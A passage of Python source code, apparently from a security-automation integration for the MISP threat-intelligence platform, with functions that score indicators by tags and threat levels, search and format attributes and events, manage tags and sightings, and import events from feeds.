datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else "" def replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]: """ Replacing keys from MISP's format to Demisto's (as appear in ENTITIESDICT) Args: obj_to_build (Union[dict, list, str]): object to replace keys in Returns: Union[dict, list, str]: same object type that got in """ if isinstance(obj_to_build, list): return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build] if isinstance(obj_to_build, dict): return { (MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key): replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items() } return obj_to_build def reputation_command_to_human_readable(outputs, score, events_to_human_readable): found_tag_id, found_tag_name = "", "" for event in events_to_human_readable: # removing those fields as they are shared by the events found_tag_id = event.pop('Tag_ID') found_tag_name = event.pop('Tag_Name') return { 'Attribute Type': outputs[0].get('Type'), 'Dbot Score': score, 'Attribute Value': outputs[0].get('Value'), 'Attribute Category': outputs[0].get('Category'), 'Timestamp': outputs[0].get('Timestamp'), 'Events with the scored tag': events_to_human_readable, 'Scored Tag ID': found_tag_id, 'Scored Tag Name': found_tag_name, } def limit_tag_output_to_id_and_name(attribute_dict, is_event_level): """ As tag list can be full of in unnecessary data, we want to limit this list to include only the ID and Name fields. In addition, returns set of the found tag ids. Some tags have a field called inherited. When it is set to 1 it says that it is an event's tag. Otherwise (if it is set to 0 or not exists) it says that it is an attribute's tag. If the data is event's (is_event_level = true) we would like to add to tag_set_ids all the tags (event ones and the event's attribute tags ones as it is part of the event scope). If the data is attribute's (is_event_level = false), and the tag is only related to an attribute we would like to add it to tag_set_ids. In any other case, we won't add the tag. Args: attribute_dict (dict): The dictionary that includes the tag list. is_event_level (bool): Whether the attribute_dict was received from an event object, meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags). """ output = [] tag_set_ids = set() tags_list = attribute_dict.get('Tag', []) for tag in tags_list: is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0' tag_id = tag.get('id') if is_event_level: tag_set_ids.add(tag_id) else: # attribute level if not is_event_tag: tag_set_ids.add(tag_id) output.append({'ID': tag_id, 'Name': tag.get('name')}) return output, tag_set_ids def parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ After getting all the attributes which match the required indicator value, this function parses the response. This function goes over all the attributes that found (after limit the attributes amount to the given limit) and by sub-functions calculated the score of the indicator. For the context data outputs, for every attribute we remove the "Related Attribute" list and limits the tags and galaxies lists. Eventually, the outputs will be a list of attributes along with their events objects. Note: When limits the attributes amount, we sort the attributes list by the event ids as the greater event ids are the newer ones. Returns: response (dict): The parsed outputs to context data (array of attributes). score: the indicator score found_tag: the tag (id) which made the indicator to get that score found_related_events (dict): contains info (name, id, threat level id) about all the events that include the indicator Please see an example for a response in test_data/reputation_command_response.json Please see an example for a parsed output in test_data/reputation_command_outputs.json """ response = copy.deepcopy(misp_response) attributes_list = response.get('Attribute') if not attributes_list: return None attributes_list = sorted(attributes_list, key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit] found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list) attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events) score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids, malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level) formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list}) return formatted_response, score, found_tag, found_related_events def prepare_attributes_array_to_context_data(attributes_list): attributes_tag_ids, event_tag_ids = set(), set() found_related_events = {} if not attributes_list: return None for attribute in attributes_list: attribute.pop("RelatedAttribute") # get rid of this useless list event = attribute.get('Event') convert_timestamp_to_readable(attribute, event) found_related_events[event.get("id")] = {"Event Name": event.get("info"), "Threat Level ID": event.get('threat_level_id'), "Event ID": event.get("id")} if event.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True) event['Tag'] = limit_tag_output event_tag_ids.update(tag_ids) if attribute.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False) attribute['Tag'] = limit_tag_output attributes_tag_ids.update(tag_ids) return found_related_events, attributes_tag_ids, event_tag_ids def convert_timestamp_to_readable(attribute, event): if attribute.get('timestamp'): attribute['timestamp'] = misp_convert_timestamp_to_date_string(attribute.get('timestamp')) if event: if event.get('timestamp'): attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp')) if event.get('publish_timestamp'): attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string( event.get('publish_timestamp')) def found_event_with_bad_threat_level_id(found_related_events): bad_threat_level_ids = ["1", "2", "3"] for event in found_related_events.values(): if event['Threat Level ID'] in bad_threat_level_ids: return True return False def get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level): """ Calculates the indicator score by following logic. Indicators of attributes and Events that: * have tags which configured as malicious will be scored 3 (i.e malicious). * have tags which configured as suspicious will be scored 2 (i.e suspicious). * don't have any tags configured as suspicious nor malicious will be scored by their event's threat level id. In such case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown. note: - In case the same tag appears in both Malicious tag ids and Suspicious tag ids lists the indicator will be scored as malicious. - Attributes tags (both malicious and suspicious) are stronger than events' tags. """ found_tag = None is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids) if is_attribute_tag_malicious: return Common.DBotScore.BAD, found_tag is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids) if is_attribute_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids) if is_event_tag_malicious: return Common.DBotScore.BAD, found_tag is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids) if is_event_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag # no tag was found if is_attribute_in_event_with_bad_threat_level: return Common.DBotScore.BAD, None return Common.DBotScore.NONE, None def get_new_misp_event_object(args): """ Create a new MISP event object and set the event's details. """ event = MISPEvent() event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')] threat_level_id_arg = args.get('threat_level_id') if threat_level_id_arg: event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg] analysis_arg = args.get('analysis') event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg event.info = args.get('info') if args.get('info') else 'Event from XSOAR' event.date = datetime.today() event.published = argToBoolean(args.get('published', 'False')) return event def create_event_command(demisto_args: dict): """Creating event in MISP with the given attribute args""" new_event = get_new_misp_event_object(demisto_args) new_event = PYMISP.add_event(new_event, True) if isinstance(new_event, dict) and new_event.get('errors'): raise DemistoException(new_event.get('errors')) event_id = new_event.id add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args) event = PYMISP.search(eventid=event_id) human_readable = f"## MISP create event\nNew event with ID: {event_id} has been successfully created.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(event), raw_response=event ) def add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None): """Adding attribute to a given MISP event object This function can be called as an independence command or as part of another command (create event for example) Args: event_id (int): Event ID to add attribute to internal (bool): if set to True, will not post results to Demisto demisto_args (dict): Demisto args new_event (MISPEvent): When this function was called from create event command, the attrubite will be added to that existing event. """ attributes_args = { 'id': demisto_args.get('event_id'), # misp event id 'type': demisto_args.get('type', 'other'), 'category': demisto_args.get('category', 'External analysis'), 'to_ids': argToBoolean(demisto_args.get('to_ids', True)), 'comment': demisto_args.get('comment'), 'value': demisto_args.get('value') } event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), "event_id") attributes_args.update({'id': event_id}) if event_id else None distribution = demisto_args.get('distribution') attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None if not new_event: response = PYMISP.search(eventid=event_id, pythonify=True) if not response: raise DemistoException( f"Error: An event with the given id: {event_id} was not found in MISP. please check it once again") new_event = response[0] # response[0] is MISP event new_event.add_attribute(**attributes_args) PYMISP.update_event(event=new_event) if internal: return value = attributes_args.get('value') updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value) human_readable = f"## MISP add attribute\nNew attribute: {value} was added to event id {new_event.id}.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(updated_event), raw_response=updated_event ) def generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): reputation_value_list = argToList(demisto_args.get(reputation_type), ',') command_results = [] for value in reputation_value_list: command_results.append( get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) return command_results def reputation_value_validation(value, dbot_type): if dbot_type == 'FILE': # hashFormat will be used only in output hash_format = get_hash_type(value) if hash_format == 'Unknown': raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256') if dbot_type == 'IP': if not is_ip_valid(value): raise DemistoException(f"Error: The given IP address: {value} is not valid") if dbot_type == 'DOMAIN': if not re.compile(DOMAIN_REGEX, regexFlags).match(value): raise DemistoException(f"Error: The given domain: {value} is not valid") if dbot_type == 'URL': if not re.compile(urlRegex, regexFlags).match(value): raise DemistoException(f"Error: The given url: {value} is not valid") if dbot_type == 'EMAIL': if not re.compile(emailRegex, regexFlags).match(value): raise DemistoException(f"Error: The given email address: {value} is not valid") def get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): """ This function searches for the given attribute value in MISP and then calculates it's dbot score. The score is calculated by the tags ids (attribute tags and event tags). Args: value (str): The indicator value (an IP address, email address, domain, url or file hash). dbot_type (str): Indicator type (file, url, domain, email or ip). malicious_tag_ids (set): Tag ids should be recognised as malicious. suspicious_tag_ids (set): Tag ids should be recognised as suspicious reliability (DBotScoreReliability): integration reliability score. attributes_limit (int) : Limits the number of attributes that will be written to the context Returns: CommandResults includes all the indicator results. """ reputation_value_validation(value, dbot_type) misp_response = PYMISP.search(value=value, controller='attributes', include_context=True, include_correlations=True, include_event_tags=True, enforce_warninglist=True, include_decay_score=True, includeSightings=True) indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type] is_indicator_found = misp_response and misp_response.get('Attribute') if is_indicator_found: outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit) dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=score, reliability=reliability, malicious_description="Match found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) all_attributes = outputs.get('Attribute') events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag) attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable) readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights, removeNull=True) readable_output += tableToMarkdown('Related events', list(found_related_events.values())) return CommandResults(indicator=indicator, raw_response=misp_response, outputs=all_attributes, outputs_prefix='MISP.Attribute', outputs_key_field='ID', readable_output=readable_output) else: dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=Common.DBotScore.NONE, reliability=reliability, malicious_description="No results were found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) return CommandResults(indicator=indicator, readable_output=f"No attributes found in MISP for value: {value}") def get_events_related_to_scored_tag(all_attributes, found_tag): """ This function searches for all the events that have the tag (i.e found_tag) which caused the indicator to be scored as malicious or suspicious. Args: all_attributes (dict): The parsed response from the MISP search attribute request found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is Unknown so no events should be found. Returns: list includes all the events that were detected as related to the tag. """ scored_events = [] if found_tag: for attribute in all_attributes: event = attribute.get('Event', {}) event_name = event.get('Info') scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name)) scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name)) return remove_duplicated_related_events(scored_events) def remove_duplicated_related_events(related_events): related_events_no_duplicates = [] for i in range(len(related_events)): if related_events[i] not in related_events[i + 1:]: related_events_no_duplicates.append(related_events[i]) return related_events_no_duplicates def search_events_with_scored_tag(object_data_dict, found_tag, event_name): """ By the given object we go over all the tags and search if found_tag is one of it's tags. If so, the event will be added to related_events list Args: object_data_dict (dict): Event or attribute dict which includes tags list. found_tag (str): The tag that was scored as malicious or suspicious. event_name (str): Name of the event """ related_events = [] object_tags_list = object_data_dict.get('Tag', []) for tag in object_tags_list: if tag.get('ID') == found_tag: event_id = get_event_id(object_data_dict) tag_name = tag.get('Name') related_events.append({'Event_ID': event_id, 'Event_Name': event_name, 'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')}) return related_events def get_event_id(data_dict): if data_dict.get('EventID'): return data_dict.get('EventID') elif data_dict.get('ID'): return data_dict.get('ID') return data_dict.get('Event', {}).get('ID') def get_dbot_indicator(dbot_type, dbot_score, value): if dbot_type == "FILE": hash_type = get_hash_type(value) if hash_type == 'md5': return Common.File(dbot_score=dbot_score, md5=value) if hash_type == 'sha1': return Common.File(dbot_score=dbot_score, sha1=value) if hash_type == 'sha256': return Common.File(dbot_score=dbot_score, sha256=value) if dbot_type == "IP": return Common.IP(ip=value, dbot_score=dbot_score) if dbot_type == "DOMAIN": return Common.Domain(domain=value, dbot_score=dbot_score) if dbot_type == "EMAIL": return Common.EMAIL(address=value, dbot_score=dbot_score) if dbot_type == "URL": return Common.URL(url=value, dbot_score=dbot_score) def build_misp_complex_filter(demisto_query: str): """ Examples are available in UT: test_build_misp_complex_filter. For more information please see build_complex_query in pymisp/api.py Args: demisto_query: complex query contains saved words: 'AND:', 'OR:' and 'NOT:' using ',' as delimiter for parameters and ';' as delimiter for operators. using the operators is optional. if 'demisto_query' does not contains any of the complex operators the original input will be returned Returns: str: dictionary created for misp to perform complex query or if no complex query found returns the original input """ regex_and = r'(AND:)([^\;]+)(;)?' regex_or = r'(OR:)([^\;]+)(;)?' regex_not = r'(NOT:)([^\;]+)(;)?' misp_query_params = dict() match_and = re.search(regex_and, demisto_query, re.MULTILINE) match_or = re.search(regex_or, demisto_query, re.MULTILINE) match_not = re.search(regex_not, demisto_query, re.MULTILINE) is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters') is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters') is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters') is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator if is_complex_search: return PYMISP.build_complex_query(**misp_query_params) return demisto_query def is_misp_complex_search_helper(match_operator, misp_query_params, operator_key): is_complex_search = False if match_operator is not None: misp_query_params[operator_key] = match_operator.group(2).split(',') is_complex_search = True return is_complex_search def prepare_args_to_search(controller): demisto_args = demisto.args() args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args} # Replacing keys and values from Demisto to Misp's keys if 'type' in args_to_misp_format: args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type') if 'to_ids' in args_to_misp_format: args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0 if 'from' in args_to_misp_format: args_to_misp_format['date_from'] = args_to_misp_format.pop('from') if 'to' in args_to_misp_format: args_to_misp_format['date_to'] = args_to_misp_format.pop('to') if 'event_id' in args_to_misp_format: args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id')) if 'last' in args_to_misp_format: args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last') if 'include_decay_score' in args_to_misp_format: args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0 if 'include_sightings' in args_to_misp_format: args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0 if 'include_correlations' in args_to_misp_format: args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0 if 'enforceWarninglist' in args_to_misp_format: args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0 if 'include_feed_correlations' in args_to_misp_format: args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get( 'include_feed_correlations') == 'true' else 0 args_to_misp_format.pop('include_feed_correlations') if 'limit' not in args_to_misp_format: args_to_misp_format['limit'] = '50' if 'tags' in args_to_misp_format: args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags']) args_to_misp_format['controller'] = controller demisto.debug(f"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}") return args_to_misp_format def build_attributes_search_response(response: Union[dict, requests.Response], include_correlations=False) -> dict: """ Convert the response of attribute search returned from MISP to the context output format. """ response_object = copy.deepcopy(response) if include_correlations: # return full related attributes only if the user wants to get them back ATTRIBUTE_FIELDS.append('RelatedAttribute') if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return get_limit_attribute_search_outputs(attributes) def get_limit_attribute_search_outputs(attributes): for i in range(len(attributes)): attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]} build_galaxy_output(attributes[i]) build_tag_output(attributes[i]) build_sighting_output_from_attribute_search_response(attributes[i]) convert_timestamp_to_readable(attributes[i], None) formatted_attributes = replace_keys_from_misp_to_context_data(attributes) return formatted_attributes def build_galaxy_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Galaxy'): given_object['Galaxy'] = [ { 'name': star.get('name'), 'type': star.get('type'), 'description': star.get('description') } for star in given_object['Galaxy'] ] def build_object_output(event): if event.get('Object'): event['Object'] = [ { 'name': event_object.get('name'), 'uuid': event_object.get('uuid'), 'description': event_object.get('description'), 'id': event_object.get('id') } for event_object in event['Object'] ] def build_tag_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Tag'): given_object['Tag'] = [ {'Name': tag.get('name'), 'is_galaxy': tag.get('is_galaxy') } for tag in given_object.get('Tag') ] def build_sighting_output_from_attribute_search_response(attribute): if attribute.get('Sighting'): attribute['Sighting'] = [ {'type': sighting.get('type') } for sighting in attribute.get('Sighting') ] def build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list: """returns list of attributes' values that match the search query when user set the arg 'compact' to True""" if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return [attribute.get('value') for attribute in attributes] def pagination_args_validation(page, limit): if page and page < 0: raise DemistoException("page should be zero or a positive number") if limit and limit < 0: raise DemistoException("limit should be zero or a positive number") def attribute_response_to_markdown_table(response: dict): attribute_highlights = [] for attribute in response: event = attribute.get('Event', {}) attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get( 'Tag') else None attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in attribute.get('Sighting')] if attribute.get('Sighting') else None attribute_highlights.append({ 'Attribute ID': attribute.get('ID'), 'Event ID': attribute.get('EventID'), 'Attribute Category': attribute.get('Category'), 'Attribute Type': attribute.get('Type'), 'Attribute Comment': attribute.get('Comment'), 'Attribute Value': attribute.get('Value'), 'Attribute Tags': attribute_tags, 'Attribute Sightings': attribute_sightings, 'To IDs': attribute.get('ToIDs'), 'Timestamp': attribute.get('Timestamp'), 'Event Info': event.get('Info'), 'Event Organization ID': event.get('OrganizationID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID') }) return attribute_highlights def search_attributes(demisto_args: dict) -> CommandResults: """Execute a MISP search over 'attributes'""" args = prepare_args_to_search('attributes') outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False)) include_correlations = argToBoolean(demisto_args.get('include_correlations', False)) page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: if outputs_should_include_only_values: response_for_context = build_attributes_search_response_return_only_values(response) number_of_results = len(response_for_context) md = tableToMarkdown(f"MISP search-attributes returned {number_of_results} attributes", response_for_context[:number_of_results], ["Value"]) else: response_for_context = build_attributes_search_response(response, include_correlations) attribute_highlights = attribute_response_to_markdown_table(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-attributes returned {len(response_for_context)} attributes\n {pagination_message}", attribute_highlights, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Attribute", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No attributes found in MISP for the given filters: {args}") def build_events_search_response(response: Union[dict, requests.Response]) -> dict: """ Convert the response of event search returned from MISP to the context output format. please note: attributes are excluded from search-events output as the information is too big. User can use the command search-attributes in order to get the information about the attributes. """ response_object = copy.deepcopy(response) if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) events = [event.get('Event') for event in response_object] for i in range(0, len(events)): # Filter object from keys in event_args events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]} events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event build_galaxy_output(events[i]) build_tag_output(events[i]) build_object_output(events[i]) events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp')) events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp')) formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore return formatted_events # type: ignore def event_to_human_readable_tag_list(event): event_tags = event.get('Tag', []) if event_tags: return [tag.get('Name') for tag in event_tags] def event_to_human_readable_galaxy_list(event): event_galaxies = event.get('Galaxy', []) if event_galaxies: return [galaxy.get('Name') for galaxy in event.get('Galaxy')] def event_to_human_readable_object_list(event): event_objects = event.get('Object', []) if event_objects: return [event_object.get('ID') for event_object in event.get('Object')] def event_to_human_readable(response: dict): event_highlights = [] for event in response: event_tags = event_to_human_readable_tag_list(event) event_galaxies = event_to_human_readable_galaxy_list(event) event_objects = event_to_human_readable_object_list(event) event_highlights.append({ 'Event ID': event.get('ID'), 'Event Tags': event_tags, 'Event Galaxies': event_galaxies, 'Event Objects': event_objects, 'Publish Timestamp': event.get('PublishTimestamp'), 'Event Info': event.get('Info'), 'Event Org ID': event.get('OrganizationID'), 'Event Orgc ID': event.get('OwnerOrganization.ID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID'), }) return event_highlights def search_events(demisto_args: dict) -> CommandResults: """ Execute a MISP search using the 'event' controller. """ args = prepare_args_to_search('events') page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: response_for_context = build_events_search_response(response) event_outputs_to_human_readable = event_to_human_readable(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-events returned {len(response_for_context)} events.\n {pagination_message}", event_outputs_to_human_readable, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Event", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No events found in MISP for the given filters: {args}") def delete_event(demisto_args: dict): """ Gets an event id and deletes it. """ event_id = demisto_args.get('event_id') response = PYMISP.delete_event(event_id) if 'errors' in response: raise DemistoException(f'Event ID: {event_id} has not found in MISP: \nError message: {response}') else: human_readable = f'Event {event_id} has been deleted' return CommandResults(readable_output=human_readable, raw_response=response) def add_tag(demisto_args: dict, is_attribute=False): """ Function will add tag to given UUID of event or attribute. is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False). """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: PYMISP.tag(uuid, tag) # add the tag except PyMISPError: raise DemistoException("Adding the required tag was failed. Please make sure the UUID exists.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully added to attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully added to event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def remove_tag(demisto_args: dict, is_attribute=False): """ Function will remove tag to given UUID of event or attribute. is_attribute (bool): if the given UUID is an attribute's one. Otherwise it's event's. """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: response = PYMISP.untag(uuid, tag) if response and response.get('errors'): raise DemistoException(f'Error in `{demisto.command()}` command: {response}') except PyMISPError: raise DemistoException("Removing the required tag was failed. Please make sure the UUID and tag exist.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully removed from the event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def add_sighting(demisto_args: dict): """Adds sighting to MISP attribute """ attribute_id = demisto_args.get('id') attribute_uuid = demisto_args.get('uuid') sighting_type = demisto_args['type'] # mandatory arg att_id = attribute_id or attribute_uuid if not att_id: raise DemistoException('ID or UUID not specified') sighting_args = { 'id': attribute_id, 'uuid': attribute_uuid, 'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type] } sigh_obj = MISPSighting() sigh_obj.from_dict(**sighting_args) response = PYMISP.add_sighting(sigh_obj, att_id) if response.get('message'): raise DemistoException(f"An error was occurred: {response.get('message')}") elif response.get('Sighting'): human_readable = f'Sighting \'{sighting_type}\' has been successfully added to attribute {att_id}' return CommandResults(readable_output=human_readable) raise DemistoException(f"An error was occurred: {json.dumps(response)}") def test(malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ Test module. """ is_tag_list_valid(malicious_tag_ids) is_tag_list_valid(suspicious_tag_ids) if attributes_limit < 0: raise DemistoException('Attribute limit has to be a positive number.') response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json') if PYMISP._check_json_response(response): return 'ok' else: raise DemistoException('MISP has not connected.') def build_feed_url(demisto_args): url = demisto_args.get('feed') url = url[:-1] if url.endswith('/') else url if PREDEFINED_FEEDS.get(url): url = PREDEFINED_FEEDS[url].get('url') # type: ignore return url def add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict): """Gets an OSINT feed from url and publishing them to MISP urls with feeds for example: https://www.misp-project.org/feeds/ feed format must be MISP. """ headers = {'Accept': 'application/json'} url = build_feed_url(demisto_args) osint_url = f'{url}/manifest.json' limit = arg_to_number(demisto_args.get('limit', 2), "limit", required=True) try: uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json() events_ids = list() # type: List[Dict[str, int]] for index, uri in enumerate(uri_list, 1): response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json() misp_new_event = MISPEvent() misp_new_event.load(response) add_event_response = PYMISP.add_event(misp_new_event) event_object = add_event_response.get('Event') if event_object and 'id' in event_object: events_ids.append({'ID': event_object['id']}) if limit == len(events_ids): break human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', events_ids) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=events_ids, ) except ValueError as e: raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}') def add_object(event_id: str, obj: MISPObject): """Sending object to MISP and returning outputs Args: obj: object to add to MISP event_id: ID of event """ response = PYMISP.add_object(event_id, misp_object=obj) if 'errors' in response: raise DemistoException(f'Error in `{demisto.command()}` command: {response}') for ref in obj.ObjectReference: response = PYMISP.add_object_reference(ref) for attribute in response.get('Object', {}).get('Attribute', []): convert_timestamp_to_readable(attribute, None) response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp')) formatted_response = replace_keys_from_misp_to_context_data(response) formatted_response.update({"ID": event_id}) human_readable = f'Object has been added to MISP event ID {event_id}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=formatted_response, ) def add_file_object(demisto_args: dict): entry_id = demisto_args.get('entry_id') event_id = demisto_args.get('event_id') file_path = demisto.getFilePath(entry_id).get('path') obj = FileObject(file_path) return add_object(event_id, obj) def add_domain_object(demisto_args: dict): """Adds a domain object to MISP domain-ip description: https://www.misp-project.org/objects.html#_domain_ip """ text = demisto_args.get('text') event_id = demisto_args.get('event_id') domain = demisto_args.get('name') obj = MISPObject('domain-ip') ips = argToList(demisto_args.get('ip')) for ip in ips: obj.add_attribute('ip', value=ip) obj.add_attribute('domain', value=domain) if text: obj.add_attribute('text', value=text) return add_object(event_id, obj) def add_url_object(demisto_args: dict): """Building url object in MISP scheme Scheme described https://www.misp-project.org/objects.html#_url """ url_args = [ 'text', 'last_seen', 'first_seen' ] event_id = demisto_args.get('event_id') url = 